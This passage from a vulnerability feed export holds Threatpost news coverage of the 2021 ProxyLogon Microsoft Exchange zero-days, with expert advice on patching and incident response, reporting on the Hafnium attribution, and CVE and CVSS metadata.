In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. 
of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. 
Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. 
Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) r